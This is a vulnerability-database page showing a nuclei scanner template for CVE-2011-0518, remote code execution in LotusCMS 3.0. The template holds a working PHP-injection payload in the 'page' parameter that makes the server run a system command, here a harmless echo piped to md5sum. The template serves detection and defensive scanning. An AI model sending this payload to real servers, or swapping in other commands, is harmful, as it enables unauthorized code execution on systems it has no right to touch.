Lucene search
K

LotusCMS 3.0 - Remote Code Execution

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

LotusCMS 3.0 remote code execution via Router function by injecting PHP in the page parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-0518
10 Jan 201100:00
circl
CVE
CVE-2011-0518
20 Jan 201118:00
cve
Cvelist
CVE-2011-0518
20 Jan 201118:00
cvelist
Dsquare
LotusCMS 3.0 LFI
27 Apr 201200:00
dsquare
Metasploit
LotusCMS 3.0 eval() Remote Command Execution
6 Mar 201217:36
metasploit
NVD
CVE-2011-0518
20 Jan 201119:00
nvd
OpenVAS
LotusCMS PHP Code Execution Vulnerability
27 Jun 201300:00
openvas
Prion
Directory traversal
20 Jan 201119:00
prion
id: CVE-2011-0518

info:
  name: LotusCMS 3.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call and allow remote code execution.
  impact: |
    Remote attackers can include and execute arbitrary local files, potentially leading to remote code execution or full system compromise.
  remediation: |
    Enable magic_quotes_gpc or sanitize 'system' parameter, and update to the latest version of LotusCMS Fraise.
  reference:
    - https://github.com/Hood3dRob1n/LotusCMS-Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2011-0518
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2011-0518
    epss-score: 0.15833
    epss-percentile: 0.96459
    cwe-id: CWE-77
  metadata:
    max-request: 2
    verified: true
  tags: cve,cve2011,lotuscms,rce,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php"
      - "{{BaseURL}}/lcms/index.php"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: |
      page=index');${system('echo lotuscms_rce | md5sum')};#

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "38ee63071a04dc5e04ed22624c38e648"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ac08ce86dd413ad5462010c9f2287b56fdae467a19a5bc3b1c444acb483ffeed02207418aead9ab61fa84ffe3e42443593abb2ce89ec99a43ee97cc8a3aad42f2f0c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25.1
EPSS0.15833
10